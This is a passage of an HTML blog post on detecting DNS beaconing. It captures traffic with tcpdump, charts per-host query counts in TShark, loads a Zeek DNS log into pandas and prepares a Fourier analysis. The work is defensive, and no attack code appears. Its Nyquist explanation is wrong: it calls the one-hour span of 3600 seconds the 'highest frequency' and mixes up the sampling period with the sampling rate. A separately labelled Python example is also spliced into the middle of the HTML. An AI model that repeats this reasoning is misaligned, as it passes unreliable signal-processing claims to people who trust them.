<span><b><span style="color: #fcff01;">**18:39:28**</span></b><span style="color: white;">.144568 IP 10.0.0.9.49995 > 10.0.0.2.53: 40641+ A? somedomain.securitynik.local. (44) </span></span>
<span><b><span style="color: #fcff01;">**18:39:28**</span></b><span style="color: white;">.144829 IP 10.0.0.2.53 > 10.0.0.9.49995: 40641 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span></span>
<span style="color: white;">18:39:29.172416 IP 10.0.0.32.41636 > 10.0.0.2.53: 2+ A? pool.ntp.org. (30) </span>
<span style="color: white;">18:39:29.181785 IP 10.0.0.2.53 > 10.0.0.32.41636: 2 4/0/0 A 162.159.200.123, A 137.220.55.232, A 217.180.209.214, A 209.115.181.107 (94) </span>
<span style="color: white;">...</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>It seems this DNS query is being made every 2 seconds. </p><p>This may be some type of beaconing, or it may just be normal activity. </p><p>Let's dig a bit deeper with TShark to confirm there is definitely something worth paying attention to. </p><p>First, capture a few packets with <i>tcpdump</i> and write them to the file system. </p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ **sudo tcpdump -n --interface 2 '(port 53) and not (host 127.0.0.1)' -v -w /tmp/dns-beacon.pcap** </span>
<span style="color: white;">tcpdump: listening on any, link-type EN10MB (Ethernet), snapshot length 262144 bytes </span>
<span style="color: white;">^C368 packets captured </span>
<span style="color: white;">368 packets received by filter </span>
</pre></div>
</div><div><br /></div><div>Take a look at some of the statistics from TShark for this specific host, 10.0.0.9, in 2-second intervals.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ tshark -n -r /tmp/dns-beacon.pcap -q -z "io,stat,2,ip.addr==10.0.0.9 && udp.port==53" -t ad | more </span>
<span style="color: white;">=============================================== </span>
<span style="color: white;">| IO Statistics | </span>
<span style="color: white;">| | </span>
<span style="color: white;">| Duration: 205. 49758 secs | </span>
<span style="color: white;">| Interval: 2 secs | </span>
<span style="color: white;">| | </span>
<span style="color: white;">| Col 1: ip.addr==10.0.0.9 && udp.port==53 | </span>
<span style="color: white;">|---------------------------------------------| </span>
<span style="color: white;">| |1 | | </span>
<span style="color: white;">| Date and time | Frames | Bytes | | </span>
<span style="color: white;">|--------------------------------------| | </span>
<span style="color: white;">| 2023-10-01 18:46:05 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:07 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:09 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:11 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:13 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:15 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:17 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:19 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:21 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:23 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:25 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:27 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:29 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:31 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:33 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:35 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:37 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:39 | 2 | 331 | | </span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Clearly from the above, we can see there is something interesting: every 2 seconds we see the same 2 frames totalling 331 bytes. </div><div><br /></div><div>At this point, we could connect to the host to try to learn which process is making this request. </div><div><br /></div><div>I'm taking a different route, as this post/notebook is about looking at things from the network perspective. </div><div><br /></div><div>Fortunately for us, one of the tools in this monitored environment is Zeek, a security monitoring framework we spend a lot of time on during day 4 of the <a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/ " target="_blank">SANS SEC503: Network Monitoring and Threat Detection In-Depth</a>.</div><div><br /></div><div>While I could pull the log for this specific period, let's instead go back in time and extract a historical log. More specifically, I'm taking a log from a time when we know this network should not be busy: the file that should hold the records between 01:00 and 02:00 AM.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ ** ls /opt/zeek/logs/2023-10-01/dns.01\:00\:00-02\:00\:00.log.gz** </span>
<span style="color: white;">/opt/zeek/logs/2023-10-01/dns.01:00:00-02:00:00.log.gz </span>
</pre></div>
</div><div><br /></div><div>Let's read this log with <i>zcat</i>, pipe it into <i>jq</i>, and then write it out to a file.</div><div><br /></div><div><div>Here is what a sample record from Zeek's DNS log looks like in JSON.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ zcat /opt/zeek/logs/2023-10-01/dns.01\:00\:00-02\:00\:00.log.gz | jq '.' | more </span>
<span style="color: white;">{ </span>
<span style="color: white;"> "ts": 1696122000.354959, </span>
<span style="color: white;"> "uid": "CZ7wYd2iz86Xl4KbKl", </span>
<span style="color: white;"> "id.orig_h": "10.0.0.4",</span>
<span style="color: white;"> "id.orig_p": 45084,</span>
<span style="color: white;"> "id.resp_h": "172.17.17.202",</span>
<span style="color: white;"> "id.resp_p": 53,</span>
<span style="color: white;"> "proto": "udp",</span>
<span style="color: white;"> "trans_id": 45635,</span>
<span style="color: white;"> "query": "4.0.0.10.in-addr.arpa",</span>
<span style="color: white;"> "qclass": 1,</span>
<span style="color: white;"> "qclass_name": "C_INTERNET",</span>
<span style="color: white;"> "qtype": 12,</span>
<span style="color: white;"> "qtype_name": "PTR",</span>
<span style="color: white;"> "rcode": 3,</span>
<span style="color: white;"> "rcode_name": "NXDOMAIN",</span>
<span style="color: white;"> "AA": false,</span>
<span style="color: white;"> "TC": false,</span>
<span style="color: white;"> "RD": true,</span>
<span style="color: white;"> "RA": false,</span>
<span style="color: white;"> "Z": 0,</span>
<span style="color: white;"> "rejected": false</span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div><div>Write the log out to a file that can be read by Pandas. </div><div>Notice the "--slurp" option: Zeek writes one JSON document per line, and --slurp gathers them into a single JSON array. If I don't use it, Pandas complains about trailing data and fails to read the file. See this link: <a href="https://datascientyst.com/fix-valueerror-trailing-data-pandas-and-json/" target="_blank">https://datascientyst.com/fix-valueerror-trailing-data-pandas-and-json/</a></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ zcat /opt/zeek/logs/2023-10-01/dns.01\:00\:00-02\:00\:00.log.gz | jq '.' --slurp > /tmp/dns-beacon-blog.json</span>
<span style="color: white;">securitynik@peeper:~$ ls /tmp/dns-beacon-blog.json</span>
<span style="color: white;">/tmp/dns-beacon-blog.json </span>
</pre></div>
</div><div><br /></div><div>With this file in place, let's now copy the file to our local system where we will leverage some data science and the Fast Fourier Transform algorithm to solve this beaconing issue once and for all :-) </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\SecurityNik>scp securitynik@peeper:/tmp/dns-beacon-blog.json d:\ml\dns-beacon-blog.json </span>
<span style="color: white;">securitynik@peeper's password: </span>
<span style="color: white;">dns-beacon-blog.json 100% 5337KB 12.4MB/s 00:00 </span>
</pre></div>
</div><div><br /></div><div>Load some libraries to start getting the real work done</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">import numpy as np</span>
<span style="color: white;">import pandas as pd</span>
<span style="color: white;">import plotly.express as px</span>
<span style="color: white;">import plotly.graph_objects as go</span>
<span style="color: white;">import matplotlib.pyplot as plt</span>
</pre></div>
</div><div><br /></div><div><div>Read our DNS Zeek log data. Do note, while I am using the DNS log, you can use any log file you want that is coming out of Zeek. Notice though, my file is in JSON format. If you have a .CSV file, you will need to read that instead. This also means you may need to make other changes as you read your input.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns = pd.read_json(r'd:/ML/dns-beacon-blog.json', date_unit='s')</span>
<span style="color: white;">df_dns</span>
<span style="color: white;">ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto trans_id query qclass ... rcode_name AA TC RD RA Z rejected rtt answers TTLs</span>
<span style="color: white;">0 1.696122e+09 CZ7wYd2iz86Xl4KbKl 10.0.0.4 45084 172.17.17.202 53 udp 45635 4.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">1 1.696122e+09 CZ7wYd2iz86Xl4KbKl 10.0.0.4 45084 172.17.17.202 53 udp 45635 4.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">2 1.696122e+09 C3uf182pULaa9EMXSk 10.0.0.4 50481 172.17.17.202 53 udp 22814 37.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">3 1.696122e+09 C3uf182pULaa9EMXSk 10.0.0.4 50481 172.17.17.202 53 udp 22814 37.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">4 1.696122e+09 CCUXAw1G7JacmmyKg5 10.0.0.4 57870 172.17.17.202 53 udp 43043 2.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...</span>
<span style="color: white;">8212 1.696126e+09 CKcOYZKBKoynKzGWb 10.0.0.8 45024 172.17.17.198 53 udp 60189 3.pool.ntp.org 1.0 ... NOERROR False False True True 0 False 0.015551 [192.95.0.223, 158.69.20.38, 174.94.155.224, 1... [26, 26, 26, 26]</span>
<span style="color: white;">8213 1.696126e+09 Cybpy5GqwGfARfcBd 10.0.0.8 47334 172.17.17.198 53 udp 60445 time.google.com 1.0 ... NOERROR False False True True 0 False 0.015610 [216.239.35.8, 216.239.35.12, 216.239.35.0, 21... [13571, 13571, 13571, 13571]</span>
<span style="color: white;">8214 1.696126e+09 CoJXrj4DErFd7n6BMk 10.0.0.9 40965 10.0.0.2 53 udp 10875 somedomain.securitynik.local 1.0 ... NOERROR False False True True 0 False 0.000250 [somedomain.ca.securitynik.local, a37295100167... [83, 23, 23, 23]</span>
<span style="color: white;">8215 1.696126e+09 CPwL9M3cooP7rtZmB9 10.0.0.24 36625 10.0.0.2 53 udp 44475 i.ytimg.com 1.0 ... NOERROR False False True True 0 False 0.013948 [142.251.33.182, 142.251.41.86, 142.251.32.86,... [274, 274, 274, 274]</span>
<span style="color: white;">8216 1.696126e+09 CQVtNH8FvtlwO44Fl 10.0.0.24 58969 10.0.0.2 53 udp 60354 youtubei.googleapis.com 1.0 ... NOERROR False False True True 0 False 0.035568 [142.251.32.74, 142.251.41.42, 172.217.1.10, 1... [249, 249, 249, 249, 249, 249]</span>
<span style="color: white;">8217 rows × 24 columns</span>
</pre></div>
</div><div><br /></div><div><div>Get the list of columns. I need this as I will drop a few columns.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.columns</span>
<span style="color: white;">Index(['ts', 'uid', 'id.orig_h', 'id.orig_p', 'id.resp_h', 'id.resp_p',</span>
<span style="color: white;"> 'proto', 'trans_id', 'query', 'qclass', 'qclass_name', 'qtype',</span>
<span style="color: white;"> 'qtype_name', 'rcode', 'rcode_name', 'AA', 'TC', 'RD', 'RA', 'Z',</span>
<span style="color: white;"> 'rejected', 'rtt', 'answers', 'TTLs'],</span>
<span style="color: white;"> dtype='object')</span>
</pre></div>
</div><div><br /></div><div><div>Let's go ahead and drop some of these columns that are of no use to us. I'm keeping the port to also see if all of this activity is occurring on the same source port. Dropping the destination port as we know this is DNS. Definitely keeping the timestamp as this is what Joe used in his code to find beacons. It is also what we will use. Definitely also keeping the query as we need to know what domain the host(s) was/were trying to resolve.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns = df_dns.drop(columns=[ 'uid', 'id.resp_p', 'proto', 'trans_id', 'qclass', 'qclass_name', 'qtype', 'qtype_name', 'rcode', 'rcode_name', 'AA', 'TC', 'RD', 'RA', 'Z', 'rejected', 'rtt', 'answers', 'TTLs'], inplace=False)</span>
<span style="color: white;"># View the first 5 records</span>
<span style="color: white;">df_dns.iloc[:5]</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">0 1.696122e+09 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">1 1.696122e+09 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">2 1.696122e+09 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">3 1.696122e+09 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">4 1.696122e+09 10.0.0.4 57870 172.17.17.202 2.0.0.10.in-addr.arpa</span>
</pre></div>
</div><div><br /></div><div><div>Here is one of these timestamps in full, as a Unix epoch value</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.ts[1]</span>
<span style="color: white;">1696122000.366851</span>
</pre></div>
</div><div><br /></div><div><div>Let's get this time into a format we can understand. More specifically, convert it to a datetime with second resolution.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.ts[1].astype(dtype='datetime64[s]')</span>
<span style="color: white;">numpy.datetime64('2023-10-01T01:00:00')</span>
</pre></div>
</div><div><br /></div><div><div>Convert all the timestamps to human-readable datetimes</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns['ts'] = df_dns['ts'].astype(dtype='datetime64[s]')</span>
<span style="color: white;">df_dns</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">0 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">1 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">2 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">3 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">4 2023-10-01 01:00:00 10.0.0.4 57870 172.17.17.202 2.0.0.10.in-addr.arpa</span>
<span style="color: white;">... ... ... ... ... ...</span>
<span style="color: white;">8212 2023-10-01 01:59:57 10.0.0.8 45024 172.17.17.198 3.pool.ntp.org</span>
<span style="color: white;">8213 2023-10-01 01:59:57 10.0.0.8 47334 172.17.17.198 time.google.com</span>
<span style="color: white;">8214 2023-10-01 01:59:58 10.0.0.9 40965 10.0.0.2 somedomain.securitynik.local</span>
<span style="color: white;">8215 2023-10-01 01:59:59 10.0.0.24 36625 10.0.0.2 i.ytimg.com</span>
<span style="color: white;">8216 2023-10-01 01:59:59 10.0.0.24 58969 10.0.0.2 youtubei.googleapis.com</span>
<span style="color: white;">8217 rows × 5 columns</span>
</pre></div>
</div><div><br /></div><div><div>I would like this data to be between 01:00 and 02:00 AM. The primary reason is that it makes it easier for me to keep track of my sampling period. Let's verify there is no data outside this range. This returns one record; not a major concern, but I will still drop it.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns[df_dns.ts < '2023-10-01 01:00:00' ]</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">48 2023-10-01 00:59:55 10.0.0.10 5353 224.0.0.251 _googlecast._tcp.local</span>
</pre></div>
</div><div><br /></div><div><div>Dropping the one record above</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.drop(df_dns[df_dns.ts < '2023-10-01 01:00:00' ].index, inplace=True)</span>
</pre></div>
</div><div><br /></div><div>Any records later than 01:59? Looks like there are none.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
</pre></div>
</div><div><br /></div><div>Sort by the timestamp (ts) column, ascending from 01:00 AM to 01:59 AM. The sorted frame has to be assigned back (or sorted with inplace=True): on its own, sort_values only returns a sorted copy and leaves df_dns unsorted.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns = df_dns.sort_values(by='ts', ascending=True)</span>
<span style="color: white;">df_dns</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">0 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">1 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">2 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">3 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">4 2023-10-01 01:00:00 10.0.0.4 57870 172.17.17.202 2.0.0.10.in-addr.arpa</span>
<span style="color: white;">... ... ... ... ... ...</span>
<span style="color: white;">8212 2023-10-01 01:59:57 10.0.0.8 45024 172.17.17.198 3.pool.ntp.org</span>
<span style="color: white;">8213 2023-10-01 01:59:57 10.0.0.8 47334 172.17.17.198 time.google.com</span>
<span style="color: white;">8214 2023-10-01 01:59:58 10.0.0.9 40965 10.0.0.2 somedomain.securitynik.local</span>
<span style="color: white;">8215 2023-10-01 01:59:59 10.0.0.24 36625 10.0.0.2 i.ytimg.com</span>
<span style="color: white;">8216 2023-10-01 01:59:59 10.0.0.24 58969 10.0.0.2 youtubei.googleapis.com</span>
<span style="color: white;">8216 rows × 5 columns</span>
</pre></div>
</div><div><br /></div><div>Visualize the time period</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">fig = px.histogram(data_frame=df_dns, x='ts', title='Originator IP Bytes Between 1 and 2 AM')</span>
<span style="color: white;">fig.show()</span>
</pre></div>
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUd5hF9O8JqL3TCP0xWpSyxuZxstDxfifi1ODNPHPPkIg0QPdrUXydpxUu2fdAWPg9wCowcz8GPy2haSklmFSwAoqfN6QKztVbqDIGRz0ZpQOgy8Ydp90Hv_-pdIH0hMX5kOSGJ5WlGMYrW2zpChrquQJ0zfozQnOPE_em9zP_14NlQB5-qo0FlA4HyOU/s1138/Fourier%20Time%20Plot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUd5hF9O8JqL3TCP0xWpSyxuZxstDxfifi1ODNPHPPkIg0QPdrUXydpxUu2fdAWPg9wCowcz8GPy2haSklmFSwAoqfN6QKztVbqDIGRz0ZpQOgy8Ydp90Hv_-pdIH0hMX5kOSGJ5WlGMYrW2zpChrquQJ0zfozQnOPE_em9zP_14NlQB5-qo0FlA4HyOU/w640-h254/Fourier%20Time%20Plot.png" width="640" /></a></div><div>The sampling rate must be at least 2* the highest frequency we're trying to find.</div><div><a href="https://www.allaboutcircuits.com/technical-articles/nyquist-shannon-theorem-understanding-sampled-systems/" target="_blank">https://www.allaboutcircuits.com/technical-articles/nyquist-shannon-theorem-understanding-sampled-systems/</a></div><div>Above, the time span is 1 hour or 60 minutes or 3600 seconds</div><div>We then need to sample this signal at a rate of at least 2 times the highest frequency</div><div>Since this is in seconds, the highest frequency is 3600</div><div>Hence we need to sample preferably uniformly at a rate of at least 2*3600</div><div>Sampling at a rate of at least 2*3600 allows us to be able to reconstruct the original signal in the time domain, from the frequency domain if needed</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sampling_period = 
3600</span>
<span style="color: white;">sampling_period</span>
</pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">3600</span></pre></div>
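Here is the whole pipeline so far in plain Python, as an added example that is not the post's own code: parse Zeek's one-document-per-line JSON dns.log (the reason jq --slurp was needed above), keep one host's queries inside the 01:00-02:00 window, count them per 1-second bin (twice the 0.5 Hz beacon frequency, as the Nyquist note requires) and read the beacon period off the magnitude spectrum of a radix-2 FFT. The hosts, queries and timestamps are constructed sample data; only the window and host 10.0.0.9 follow the post.

```python
# Added example, not the post's own code: Zeek JSON dns.log -> per-host
# 1-second bins -> FFT -> beacon period, with only the standard library.
# Hosts, queries and timestamps are constructed sample data.
import cmath
import json
import random
from datetime import datetime, timezone

WINDOW_START = datetime(2023, 10, 1, 1, 0, tzinfo=timezone.utc).timestamp()  # 1696122000.0
WINDOW_SECONDS = 3600   # the one-hour log slice
BIN_SECONDS = 1         # sampling period
FFT_LEN = 2048          # largest power of two that fits in 3600 one-second bins


def build_sample_log(beacons, noise_hosts, seed=7):
    """Constructed Zeek-style JSON lines. Each beacon host queries its domain
    every `period` seconds with +/-50 ms jitter; noise hosts query at random."""
    rng = random.Random(seed)
    recs = [{"ts": WINDOW_START - 5, "id.orig_h": "10.0.0.10",
             "query": "_googlecast._tcp.local"}]      # the 00:59:55 straggler
    for host, period in beacons.items():
        t = WINDOW_START + 0.12
        while t < WINDOW_START + WINDOW_SECONDS:
            recs.append({"ts": t + rng.uniform(-0.05, 0.05), "id.orig_h": host,
                         "query": "somedomain.securitynik.local"})
            t += period
    for host in noise_hosts:
        for _ in range(120):
            recs.append({"ts": WINDOW_START + rng.uniform(0, WINDOW_SECONDS),
                         "id.orig_h": host, "query": "i.ytimg.com"})
    rng.shuffle(recs)   # deliberately unsorted, like a log read out of order
    return "\n".join(json.dumps(r) for r in recs) + "\n"


def parse_zeek_json_lines(text):
    """One JSON object per line, as zcat showed above; not a JSON array."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def bin_counts(records, orig_h, bin_seconds=BIN_SECONDS):
    """Queries from orig_h per bin; records outside the window are dropped,
    as the post drops its 00:59:55 record."""
    counts = [0] * (WINDOW_SECONDS // bin_seconds)
    for rec in records:
        offset = rec["ts"] - WINDOW_START
        if rec["id.orig_h"] == orig_h and 0 <= offset < WINDOW_SECONDS:
            counts[int(offset // bin_seconds)] += 1
    return counts


def fft(x):
    """Recursive radix-2 Cooley-Tukey FFT; len(x) must be a power of two."""
    n = len(x)
    if n == 1:
        return [complex(x[0])]
    even, odd = fft(x[0::2]), fft(x[1::2])
    out = [0j] * n
    for k in range(n // 2):
        twiddle = cmath.exp(-2j * cmath.pi * k / n) * odd[k]
        out[k] = even[k] + twiddle
        out[k + n // 2] = even[k] - twiddle
    return out


def dominant_period(counts, bin_seconds=BIN_SECONDS, fft_len=FFT_LEN):
    """Beacon period in seconds, or None when no frequency stands out.
    The mean is subtracted so the DC term does not swamp the spectrum; the peak
    must be at least 6x the RMS magnitude to count; and the lowest frequency
    within half of the peak is reported, so the harmonics of a pulse train
    (every 8 s also lights up 4 s, 8/3 s and 2 s) do not hide the fundamental."""
    window = counts[:fft_len]
    mean = sum(window) / len(window)
    mags = [abs(v) for v in fft([c - mean for c in window])[1:fft_len // 2 + 1]]
    peak = max(mags)                                   # index i is bin k = i + 1
    rms = (sum(m * m for m in mags) / len(mags)) ** 0.5
    if peak == 0 or peak < 6 * rms:
        return None
    k = next(i + 1 for i, m in enumerate(mags) if m >= 0.5 * peak)
    return fft_len * bin_seconds / k                   # period = N * dt / k


if __name__ == "__main__":
    recs = parse_zeek_json_lines(
        build_sample_log({"10.0.0.9": 2.0, "10.0.0.77": 8.0}, ("10.0.0.24",)))
    for host in ("10.0.0.9", "10.0.0.77", "10.0.0.24"):
        print(host, dominant_period(bin_counts(recs, host)))   # 2.0, 8.0, None
```

The frequency resolution is 1/(FFT_LEN * BIN_SECONDS) Hz, so periods that do not divide the analysed span land between bins and the estimate is only approximate; shrinking the bin or using a longer window sharpens it.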
</div><div><br /></div><div>The sampling rate is every 1 second. Hence we do 1./3600 to get the frequency per second</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">1./sampling_period</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">0.0002777777777777778</span></pre></div></div><div><br /></div></div><div>To get the frequency per minute or per 60 seconds, we do (1./3600) * 60</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 